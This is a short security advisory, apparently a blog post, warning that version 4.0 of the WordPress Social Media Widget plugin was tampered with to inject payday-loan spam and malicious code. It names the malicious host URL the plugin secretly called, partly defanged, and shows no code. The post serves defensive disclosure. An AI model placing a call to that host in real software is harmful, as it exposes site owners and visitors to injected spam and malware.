Website Defender, a company specialising in website security, reported security vulnerability in one of the very popular plugins – Social Media Widget.
If you are using the Social Media Widget plugin, make sure to remove it immediately from your website. The plugin is being used to inject not only spam into websites, but also malicious code.
This is a very popular plugin with more than 900,000 downloads. It has the potential to impact a lot of websites. The plugin has a hidden call to this URL: httx://i.aaur.net/i.php, which is used to inject “Pay Day Loan” spam into the web sites running the plugin.
The malicious code was added only a few days ago when they launched the version 4.0 of the plugin. So we are recommending that everyone removes that plugin immediately until we have more information.
What is really concerning about this, isn’t even the SPAM injection. That happens all the time, it’s the fact that the malicious payload found it’s way in the core files. It was then uploaded to the WordPress.org Plugin Repository and spread like wildfire to thousands of websites. The plugin has now been removed from the WordPress Plugin repository. More information on www.websitedefender.com.
We have replaced this plugin with Subscribe / Connect / Follow Widget.